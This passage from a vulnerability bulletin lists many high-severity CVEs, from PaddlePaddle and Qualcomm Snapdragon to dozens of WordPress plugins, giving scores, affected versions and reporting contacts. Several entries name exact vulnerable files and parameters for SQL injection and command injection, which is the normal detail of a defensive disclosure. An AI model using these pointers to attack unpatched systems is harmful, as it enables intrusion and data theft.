paddlepaddle — paddlepaddle FPE in paddle.argmin and paddle.argmax in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service. 2024-01-03 7.5 CVE-2023-52313
paddle-security@baidu.com
pandorafms — pandora_fms Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Pandora FMS on all allows SQL Injection. Arbitrary SQL queries were allowed to be executed using any account with low privileges. This issue affects Pandora FMS: from 700 through 774. 2023-12-29 8.8 CVE-2023-44088
security@pandorafms.com
perl — perl A vulnerability was found in Perl. This security issue occurs while Perl for Windows relies on the system path environment variable to find the shell (`cmd.exe`). When running an executable that uses the Windows Perl interpreter, Perl attempts to find and execute `cmd.exe` within the operating system. However, due to path search order issues, Perl initially looks for cmd.exe in the current working directory. This flaw allows an attacker with limited privileges to place `cmd.exe` in locations with weak permissions, such as `C:\ProgramData`. By doing so, arbitrary code can be executed when an administrator attempts to use this executable from these compromised locations. 2024-01-02 7.8 CVE-2023-47039
secalert@redhat.com
poly — multiple_products A vulnerability classified as problematic was found in Poly CCX 400, CCX 600, Trio 8800 and Trio C60. This vulnerability affects unknown code of the component HTTP Header Handler. The manipulation of the argument Cookie leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249256. 2023-12-29 7.5 CVE-2023-4463
cna@vuldb.com
nvd@nist.gov
poly — multiple_products A vulnerability, which was classified as critical, has been found in Poly CCX 400, CCX 600, Trio 8800 and Trio C60. This issue affects some unknown processing of the component Diagnostic Telnet Mode. The manipulation leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component. The identifier VDB-249257 was assigned to this vulnerability. 2023-12-29 7.2 CVE-2023-4464
cna@vuldb.com
poly — trio_8800/trio_c60 A vulnerability was found in Poly Trio 8800 and Trio C60. It has been classified as problematic. This affects an unknown part of the component Poly Lens Management Cloud Registration. The manipulation leads to missing authorization. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. The identifier VDB-249261 was assigned to this vulnerability. 2023-12-29 7.6 CVE-2023-4468
cna@vuldb.com
nvd@nist.gov
prestashop — prestashop PrestaShop is an open-source e-commerce platform. Prior to versions 8.1.3 and 1.7.8.11, some event attributes are not detected by the `isCleanHTML` method. Some modules using the `isCleanHTML` method could be vulnerable to cross-site scripting. Versions 8.1.3 and 1.7.8.11 contain a patch for this issue. The best workaround is to use the `HTMLPurifier` library to sanitize html input coming from users. The library is already available as a dependency in the PrestaShop project. Beware though that in legacy object models, fields of `HTML` type will call `isCleanHTML`. 2024-01-02 8.1 CVE-2024-21627
security-advisories@github.com
priva — topcontrol_suite The Priva TopControl Suite contains predictable credentials for the SSH service, based on the serial number, which makes it possible for an attacker to calculate the login credentials for the Priva TopControl Suite. 2024-01-02 7.5 CVE-2022-3010
csirt@divd.nl
qnap_systems_inc. — qts/quts_hero A prototype pollution vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to override existing attributes with ones that have incompatible type, which may lead to a crash via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.3.2578 build 20231110 and later; QuTS hero h5.1.3.2578 build 20231110 and later. 2024-01-05 7.5 CVE-2023-39296
security@qnapsecurity.com.tw
qnap_systems_inc. — qumagie An OS command injection vulnerability has been reported to affect QuMagie. If exploited, the vulnerability could allow authenticated users to execute commands via a network. We have already fixed the vulnerability in the following version: QuMagie 2.2.1 and later 2024-01-05 7.4 CVE-2023-47560
security@qnapsecurity.com.tw
qnap_systems_inc. — video_station An OS command injection vulnerability has been reported to affect Video Station. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following version: Video Station 5.7.2 ( 2023/11/23 ) and later 2024-01-05 8.8 CVE-2023-41288
security@qnapsecurity.com.tw
qualcomm,_inc. — snapdragon Memory corruption in Data Modem when a non-standard SDP body, during a VOLTE call. 2024-01-02 9.8 CVE-2023-33025
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Memory corruption in HLOS while running playready use-case. 2024-01-02 9.3 CVE-2023-33030
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Memory corruption in TZ Secure OS while requesting a memory allocation from TA region. 2024-01-02 9.3 CVE-2023-33032
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Memory corruption in Audio during playback with speaker protection. 2024-01-02 8.4 CVE-2023-33033
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Memory corruption while running VK synchronization with KASAN enabled. 2024-01-02 8.4 CVE-2023-33094
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Memory corruption in Graphics Driver when destroying a context with KGSL_GPU_AUX_COMMAND_TIMELINE objects queued. 2024-01-02 8.4 CVE-2023-33108
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Memory corruption when resource manager sends the host kernel a reply message with multiple fragments. 2024-01-02 8.4 CVE-2023-33113
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Memory corruption while running NPU, when NETWORK_UNLOAD and (NETWORK_UNLOAD or NETWORK_EXECUTE_V2) commands are submitted at the same time. 2024-01-02 8.4 CVE-2023-33114
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Memory corruption while invoking IOCTLs calls from user space for internal mem MAP and internal mem UNMAP. 2024-01-02 8.4 CVE-2023-43514
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Information disclosure in Core services while processing a Diag command. 2024-01-02 7.6 CVE-2023-33014
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Permanent DOS in Hypervisor while untrusted VM without PSCI support makes a PSCI call. 2024-01-02 7.1 CVE-2023-33036
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Cryptographic issue in Automotive while unwrapping the key secs2d and verifying with RPMB data. 2024-01-02 7.1 CVE-2023-33037
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Transient DOS in Data Modem during DTLS handshake. 2024-01-02 7.5 CVE-2023-33040
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Transient DOS in WLAN Firmware while parsing a BTM request. 2024-01-02 7.5 CVE-2023-33062
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Memory corruption in wearables while processing data from AON. 2024-01-02 7.8 CVE-2023-33085
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Transient DOS while processing a WMI P2P listen start command (0xD00A) sent from host. 2024-01-02 7.5 CVE-2023-33109
product-security@qualcomm.com
qualcomm,_inc. — snapdragon The session index variable in PCM host voice audio driver initialized before PCM open, accessed during event callback from ADSP and reset during PCM close may lead to race condition between event callback – PCM close and reset session index causing memory corruption. 2024-01-02 7.8 CVE-2023-33110
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Transient DOS when WLAN firmware receives “reassoc response” frame including RIC_DATA element. 2024-01-02 7.5 CVE-2023-33112
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Transient DOS while parsing ieee80211_parse_mscs_ie in WIN WLAN driver. 2024-01-02 7.5 CVE-2023-33116
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Memory corruption when HLOS allocates the response payload buffer to copy the data received from ADSP in response to AVCS_LOAD_MODULE command. 2024-01-02 7.8 CVE-2023-33117
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Memory corruption while processing Listen Sound Model client payload buffer when there is a request for Listen Sound session get parameter from ST HAL. 2024-01-02 7.8 CVE-2023-33118
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Memory corruption in Audio when memory map command is executed consecutively in ADSP. 2024-01-02 7.8 CVE-2023-33120
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Transient DOS while parsing IPv6 extension header when WLAN firmware receives an IPv6 packet that contains `IPPROTO_NONE` as the next header. 2024-01-02 7.5 CVE-2023-43511
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Transient DOS while parsing GATT service data when the total amount of memory that is required by the multiple services is greater than the actual size of the services buffer. 2024-01-02 7.5 CVE-2023-43512
product-security@qualcomm.com
red_hat — red_hat_developer_hub A flaw was found in the Red Hat Developer Hub (RHDH). The catalog-import function leaks GitLab access tokens on the frontend when the base64 encoded GitLab token includes a newline at the end of the string. The sanitized error can display on the frontend, including the raw access token. Upon gaining access to this token and depending on permissions, an attacker could push malicious code to repositories, delete resources in Git, revoke or generate new keys, and sign code illegitimately. 2024-01-04 7.3 CVE-2023-6944
secalert@redhat.com
s-cms — s-cms A vulnerability classified as critical was found in S-CMS up to 2.0_build20220529-20231006. Affected by this vulnerability is an unknown functionality of the file /s/index.php?action=statistics. The manipulation of the argument lid leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249391. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-31 8.8 CVE-2023-7189
cna@vuldb.com
s-cms — s-cms A vulnerability, which was classified as critical, has been found in S-CMS up to 2.0_build20220529-20231006. Affected by this issue is some unknown functionality of the file /member/ad.php?action=ad. The manipulation of the argument A_text/A_url/A_contact leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249392. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-31 8.8 CVE-2023-7190
cna@vuldb.com
s-cms — s-cms A vulnerability, which was classified as critical, was found in S-CMS up to 2.0_build20220529-20231006. This affects an unknown part of the file member/reg.php. The manipulation of the argument M_login/M_email leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249393 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-31 8.8 CVE-2023-7191
cna@vuldb.com
scone — scone Improper initialization of x87 and SSE floating-point configuration registers in the __scone_entry component of SCONE before 5.8.0 for Intel SGX allows a local attacker to compromise the execution integrity of floating-point operations in an enclave or access sensitive information via side-channel analysis. 2023-12-30 7.8 CVE-2022-46487
cve@mitre.org
shifuml — shifu A vulnerability has been found in ShifuML shifu 0.12.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file src/main/java/ml/shifu/shifu/core/DataPurifier.java of the component Java Expression Language Handler. The manipulation of the argument FilterExpression leads to code injection. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249151. 2023-12-29 8.1 CVE-2023-7148
cna@vuldb.com
shipping_100_fahuo100 — shipping_100_fahuo100 A vulnerability classified as critical has been found in Shipping 100 Fahuo100 up to 1.1. Affected is an unknown function of the file member/login.php. The manipulation of the argument M_pwd leads to sql injection. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. VDB-249390 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-31 8.1 CVE-2023-7188
cna@vuldb.com
sidequestvr — sidequest SideQuest is a place to get virtual reality applications for Oculus Quest. The SideQuest desktop application uses deep links with a custom protocol (`sidequest://`) to trigger actions in the application from its web contents. Because, prior to version 0.10.35, the deep link URLs were not sanitized properly in all cases, a one-click remote code execution can be achieved in cases when a device is connected, the user is presented with a malicious link and clicks it from within the application. As of version 0.10.35, the custom protocol links within the electron application are now being parsed and sanitized properly. 2024-01-04 8.8 CVE-2024-21625
security-advisories@github.com
siemens — syngo_fastview A vulnerability has been identified in syngo fastView (All versions). The affected application lacks proper validation of user-supplied data when parsing DICOM files. This could result in an out-of-bounds write past the end of an allocated structure. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-15097) 2024-01-04 7.8 CVE-2021-40367
productcert@siemens.com
siemens — syngo_fastview A vulnerability has been identified in syngo fastView (All versions). The affected application lacks proper validation of user-supplied data when parsing BMP files. This could result in an out-of-bounds write past the end of an allocated structure. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-14860) 2024-01-04 7.8 CVE-2021-42028
productcert@siemens.com
siemens — syngo_fastview A vulnerability has been identified in syngo fastView (All versions). The affected application lacks proper validation of user-supplied data when parsing BMP files. This could result in a write-what-where condition and an attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-15696) 2024-01-04 7.8 CVE-2021-45465
productcert@siemens.com
silicon_labs — gecko_sdk An unvalidated input in Silicon Labs TrustZone implementation in v4.3.x and earlier of the Gecko SDK allows an attacker to access the trusted region of memory from the untrusted region. 2024-01-02 9.3 CVE-2023-4280
product-security@silabs.com
small_crm — small_crm PHPGurukul Small CRM 3.0 is vulnerable to SQL Injection on the Users login panel because the “password” parameter is used directly in the SQL query without any sanitization, so the SQL Injection payload is executed. 2023-12-29 9.8 CVE-2023-50035
cve@mitre.org
sourcecodester — customer_support_system Sourcecodester Customer Support System 1.0 has multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_ticket via department_id, customer_id, and subject. 2023-12-29 8.8 CVE-2023-50070
cve@mitre.org
sourcecodester — customer_support_system Sourcecodester Customer Support System 1.0 has multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_department via id or name. 2023-12-29 8.8 CVE-2023-50071
cve@mitre.org
sourcecodester — engineers_online_portal A vulnerability was found in SourceCodester Engineers Online Portal 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/ of the component Admin Login. The manipulation of the argument username/password leads to sql injection. The attack may be launched remotely. The identifier of this vulnerability is VDB-249440. 2024-01-01 7.3 CVE-2024-0182
cna@vuldb.com
sourcecodester — free_and_open_source_inventory_management_system A vulnerability was found in SourceCodester Free and Open Source Inventory Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /app/ajax/sell_return_data.php. The manipulation of the argument columns[0][data] leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249179. 2023-12-29 9.8 CVE-2023-7157
cna@vuldb.com
sourcecodester — free_and_open_source_inventory_management_system A vulnerability, which was classified as critical, was found in SourceCodester Free and Open Source Inventory Management System 1.0. This affects an unknown part of the file /ample/app/action/edit_product.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249177 was assigned to this vulnerability. 2023-12-29 8.8 CVE-2023-7155
cna@vuldb.com
sqlite — sqlite3 A vulnerability was found in SQLite SQLite3 up to 3.43.0 and classified as critical. This issue affects the function sessionReadRecord of the file ext/session/sqlite3session.c of the component make alltest Handler. The manipulation leads to heap-based buffer overflow. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-248999. 2023-12-29 9.8 CVE-2023-7104
cna@vuldb.com
tencent — tencent_distributed_sql Tencent tdsqlpcloud through 1.8.5 allows unauthenticated remote attackers to discover database credentials via an index.php/api/install/get_db_info request, a related issue to CVE-2023-42387. 2023-12-31 7.5 CVE-2023-52286
cve@mitre.org
testlink — testlink TestLink through 1.9.20 allows type juggling for authentication bypass because === is not used. 2023-12-30 7.5 CVE-2023-50110
cve@mitre.org
tj-actions — verify-changed-files The [`tj-actions/verify-changed-files`](https://github.com/tj-actions/verify-changed-files) action allows for command injection in changed filenames, allowing an attacker to execute arbitrary code and potentially leak secrets. The [`verify-changed-files`](https://github.com/tj-actions/verify-changed-files) workflow returns the list of files changed within a workflow execution. This could potentially allow filenames that contain special characters such as `;` which can be used by an attacker to take over the [GitHub Runner](https://docs.github.com/en/actions/using-github-hosted-runners/about-github-hosted-runners) if the output value is used in a raw fashion (thus being directly replaced before execution) inside a `run` block. By running custom commands, an attacker may be able to steal secrets such as `GITHUB_TOKEN` if triggered on other events than `pull_request`. This has been patched in versions [17](https://github.com/tj-actions/verify-changed-files/releases/tag/v17) and [17.0.0](https://github.com/tj-actions/verify-changed-files/releases/tag/v17.0.0) by enabling `safe_output` by default and returning filename paths escaping special characters for bash environments. 2023-12-29 7.7 CVE-2023-52137
security-advisories@github.com
totolink — n350rt_firmware A vulnerability was found in Totolink N350RT 9.3.5u.6139_B20201216. It has been rated as critical. This issue affects some unknown processing of the file /cgi-bin/cstecgi.cgi?action=login&flag=ie8 of the component HTTP POST Request Handler. The manipulation leads to stack-based buffer overflow. The exploit has been disclosed to the public and may be used. The identifier VDB-249389 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-31 8.8 CVE-2023-7187
cna@vuldb.com
totolink — x2000r_firmware TOTOLINK X2000R Gh v1.0.0-B20230221.0948.web was discovered to contain a stack overflow via the function formRoute. 2023-12-30 9.8 CVE-2023-51133
cve@mitre.org
totolink — x2000r_firmware TOTOLINK X2000R Gh v1.0.0-B20230221.0948.web was discovered to contain a stack overflow via the function formPasswordSetup. 2023-12-30 9.8 CVE-2023-51135
cve@mitre.org
totolink — x2000r_firmware TOTOLINK X2000R Gh v1.0.0-B20230221.0948.web was discovered to contain a stack overflow via the function formRebootSchedule. 2023-12-30 9.8 CVE-2023-51136
cve@mitre.org
totolink — x6000r_firmware TOTOLINK X6000R v9.4.0cu.852_B20230719 was discovered to contain a remote command execution (RCE) vulnerability via the component /cgi-bin/cstecgi.cgi. 2023-12-30 9.8 CVE-2023-50651
cve@mitre.org
unified_remote — unified_remote Unified Remote 3.13.0 allows remote attackers to execute arbitrary Lua code because of a wildcarded Access-Control-Allow-Origin for the Remote upload endpoint. 2023-12-30 9.8 CVE-2023-52252
cve@mitre.org
ween_software — admin_panel Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Ween Software Admin Panel allows SQL Injection. This issue affects Admin Panel: through 20231229.  NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-29 9.8 CVE-2023-4541
iletisim@usom.gov.tr
wireshark_foundation — wireshark HTTP3 dissector crash in Wireshark 4.2.0 allows denial of service via packet injection or crafted capture file 2024-01-03 7.8 CVE-2024-0207
cve@gitlab.com
wireshark_foundation — wireshark GVCP dissector crash in Wireshark 4.2.0, 4.0.0 to 4.0.11, and 3.6.0 to 3.6.19 allows denial of service via packet injection or crafted capture file 2024-01-03 7.8 CVE-2024-0208
cve@gitlab.com
wireshark_foundation — wireshark IEEE 1609.2 dissector crash in Wireshark 4.2.0, 4.0.0 to 4.0.11, and 3.6.0 to 3.6.19 allows denial of service via packet injection or crafted capture file 2024-01-03 7.8 CVE-2024-0209
cve@gitlab.com
wireshark_foundation — wireshark Zigbee TLV dissector crash in Wireshark 4.2.0 allows denial of service via packet injection or crafted capture file 2024-01-03 7.8 CVE-2024-0210
cve@gitlab.com
wireshark_foundation — wireshark DOCSIS dissector crash in Wireshark 4.2.0 allows denial of service via packet injection or crafted capture file 2024-01-03 7.8 CVE-2024-0211
cve@gitlab.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in JS Help Desk JS Help Desk – Best Help Desk & Support Plugin. This issue affects JS Help Desk – Best Help Desk & Support Plugin through 2.7.1. 2024-01-05 10 CVE-2022-46839
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in IOSS WP MLM SOFTWARE PLUGIN. This issue affects WP MLM SOFTWARE PLUGIN through 4.0. 2023-12-29 10 CVE-2023-51475
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in David F. Carr RSVPMaker. This issue affects RSVPMaker through 10.6.6. 2023-12-29 9.8 CVE-2023-25054
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Shabti Kaplan Frontend Admin by DynamiApps. This issue affects Frontend Admin by DynamiApps through 3.18.3. 2023-12-29 9.8 CVE-2023-51411
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Piotnet Piotnet Forms. This issue affects Piotnet Forms through 1.0.25. 2023-12-29 9.8 CVE-2023-51412
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in EnvialoSimple EnvíaloSimple: Email Marketing y Newsletters. This issue affects EnvíaloSimple: Email Marketing y Newsletters through 2.1. 2023-12-29 9.8 CVE-2023-51414
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Bertha.Ai BERTHA AI. Your AI co-pilot for WordPress and Chrome. This issue affects BERTHA AI. Your AI co-pilot for WordPress and Chrome through 1.11.10.7. 2023-12-29 9.8 CVE-2023-51419
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Soft8Soft LLC Verge3D Publishing and E-Commerce. This issue affects Verge3D Publishing and E-Commerce through 4.5.2. 2023-12-29 9.9 CVE-2023-51421
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Saleswonder Team Webinar Plugin: Create live/evergreen/automated/instant webinars, stream & Zoom Meetings | WebinarIgnition. This issue affects Webinar Plugin: Create live/evergreen/automated/instant webinars, stream & Zoom Meetings | WebinarIgnition through 3.05.0. 2023-12-31 9.8 CVE-2023-51423
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Jacques Malgrange Rencontre – Dating Site. This issue affects Rencontre – Dating Site through 3.10.1. 2023-12-29 9.8 CVE-2023-51468
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Mestres do WP Checkout Mestres WP. This issue affects Checkout Mestres WP through 7.1.9.6. 2023-12-31 9.8 CVE-2023-51469
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Pixelemu TerraClassifieds – Simple Classifieds Plugin. This issue affects TerraClassifieds – Simple Classifieds Plugin through 2.0.3. 2023-12-29 9.8 CVE-2023-51473
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in realmag777 Active Products Tables for WooCommerce. Professional products tables for WooCommerce store. This issue affects Active Products Tables for WooCommerce. Professional products tables for WooCommerce store through 1.0.6. 2023-12-29 9.8 CVE-2023-51505
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in Presslabs Theme per user. This issue affects Theme per user through 1.0.1. 2023-12-31 9.8 CVE-2023-52181
audit@patchstack.com
wordpress — wordpress Missing Authorization vulnerability in Anders Thorborg. This issue affects Anders Thorborg through 1.4.12. 2023-12-29 8.8 CVE-2023-22676
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in BinaryStash WP Booklet. This issue affects WP Booklet through 2.1.8. 2023-12-29 8.8 CVE-2023-22677
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in Milan Dinić Rename Media Files. This issue affects Rename Media Files through 1.0.1. 2023-12-29 8.8 CVE-2023-32095
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in Crocoblock JetElements For Elementor. This issue affects JetElements For Elementor through 2.6.10. 2023-12-31 8.8 CVE-2023-39157
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in TienCOP WP EXtra. This issue affects WP EXtra through 6.2. 2023-12-29 8.8 CVE-2023-46623
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in Qode Interactive Qode Essential Addons. This issue affects Qode Essential Addons through 1.5.2. 2023-12-29 8.8 CVE-2023-47840
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in Brainstorm Force Astra Pro. This issue affects Astra Pro through 4.3.1. 2023-12-29 8.8 CVE-2023-49830
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in InspireUI MStore API. This issue affects MStore API through 4.10.1. 2023-12-29 8.8 CVE-2023-50878
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WPExpertsio New User Approve. This issue affects New User Approve through 2.5.1. 2023-12-29 8.8 CVE-2023-50902
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WebbaPlugins Appointment & Event Booking Calendar Plugin – Webba Booking. This issue affects Appointment & Event Booking Calendar Plugin – Webba Booking through 4.5.33. 2023-12-29 8.8 CVE-2023-51354
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Bright Plugins Block IPs for Gravity Forms. This issue affects Block IPs for Gravity Forms through 1.0.1. 2023-12-29 8.8 CVE-2023-51358
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Rise Themes Rise Blocks – A Complete Gutenberg Page Builder. This issue affects Rise Blocks – A Complete Gutenberg Page Builder through 3.1. 2023-12-29 8.8 CVE-2023-51378
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Brain Storm Force Ultimate Addons for WPBakery Page Builder. This issue affects Ultimate Addons for WPBakery Page Builder through 3.19.17. 2023-12-29 8.8 CVE-2023-51402
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in WPVibes WP Mail Log. This issue affects WP Mail Log through 1.1.2. 2023-12-29 8.8 CVE-2023-51410
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Joris van Montfort JVM Gutenberg Rich Text Icons. This issue affects JVM Gutenberg Rich Text Icons through 1.2.3. 2023-12-29 8.8 CVE-2023-51417
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in Soft8Soft LLC Verge3D Publishing and E-Commerce. This issue affects Verge3D Publishing and E-Commerce through 4.5.2. 2023-12-29 8.8 CVE-2023-51420
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in Saleswonder Team Webinar Plugin: Create live/evergreen/automated/instant webinars, stream & Zoom Meetings | WebinarIgnition. This issue affects Webinar Plugin: Create live/evergreen/automated/instant webinars, stream & Zoom Meetings | WebinarIgnition through 3.05.0. 2023-12-29 8.8 CVE-2023-51422
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in Jacques Malgrange Rencontre – Dating Site. This issue affects Rencontre – Dating Site through 3.11.1. 2023-12-29 8.8 CVE-2023-51470
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF), Deserialization of Untrusted Data vulnerability in ThemeHigh Job Manager & Career – Manage job board listings, and recruitments. This issue affects Job Manager & Career – Manage job board listings, and recruitments through 1.4.4. 2023-12-29 8.8 CVE-2023-51545
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WhileTrue Most And Least Read Posts Widget. This issue affects Most And Least Read Posts Widget through 2.5.16. 2023-12-31 8.8 CVE-2023-52133
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Ovation S.R.L. Dynamic Content for Elementor. This issue affects Dynamic Content for Elementor before 2.12.5. 2024-01-05 8.8 CVE-2023-52150
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in ARI Soft ARI Stream Quiz – WordPress Quizzes Builder. This issue affects ARI Stream Quiz – WordPress Quizzes Builder through 1.3.0. 2023-12-31 8.8 CVE-2023-52182
audit@patchstack.com
wordpress — wordpress The OMGF | GDPR/DSGVO Compliant, Faster Google Fonts. Easy. plugin for WordPress is vulnerable to unauthorized modification of data and Stored Cross-Site Scripting due to a missing capability check on the update_settings() function hooked via admin_init in all versions up to, and including, 5.7.9. This makes it possible for unauthenticated attackers to update the plugin’s settings which can be used to inject Cross-Site Scripting payloads and delete entire directories. Please note there were several attempted patches, and we consider 5.7.10 to be the most sufficiently patched. 2024-01-03 8.6 CVE-2023-6600
security@wordfence.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in miniOrange miniOrange’s Google Authenticator – WordPress Two Factor Authentication – 2FA , Two Factor, OTP SMS and Email | Passwordless login. This issue affects miniOrange’s Google Authenticator – WordPress Two Factor Authentication – 2FA , Two Factor, OTP SMS and Email | Passwordless login through 5.6.1. 2023-12-29 7.5 CVE-2022-44589
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in Kanban for WordPress Kanban Boards for WordPress. This issue affects Kanban Boards for WordPress through 2.5.21. 2023-12-29 7.2 CVE-2023-40606
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in POSIMYTH Nexter Extension. This issue affects Nexter Extension through 2.0.3. 2023-12-29 7.2 CVE-2023-45751
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WebFactory Ltd Login Lockdown – Protect Login Form. This issue affects Login Lockdown – Protect Login Form through 2.06. 2023-12-29 7.2 CVE-2023-50837
audit@patchstack.com
wordpress — wordpress Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce WooCommerce Stripe Payment Gateway. This issue affects WooCommerce Stripe Payment Gateway through 7.6.1. 2024-01-05 7.5 CVE-2023-51502
audit@patchstack.com
wordpress — wordpress Authorization Bypass Through User-Controlled Key vulnerability in Automattic WooPayments – Fully Integrated Solution Built and Supported by Woo. This issue affects WooPayments – Fully Integrated Solution Built and Supported by Woo through 6.9.2. 2023-12-31 7.5 CVE-2023-51503
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Senol Sahin AI Power: Complete AI Pack – Powered by GPT-4. This issue affects AI Power: Complete AI Pack – Powered by GPT-4 through 1.8.2. 2023-12-29 7.5 CVE-2023-51527
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WPManageNinja LLC Fluent Support – WordPress Helpdesk and Customer Support Ticket Plugin. This issue affects Fluent Support – WordPress Helpdesk and Customer Support Ticket Plugin through 1.7.6. 2023-12-31 7.2 CVE-2023-51547
audit@patchstack.com
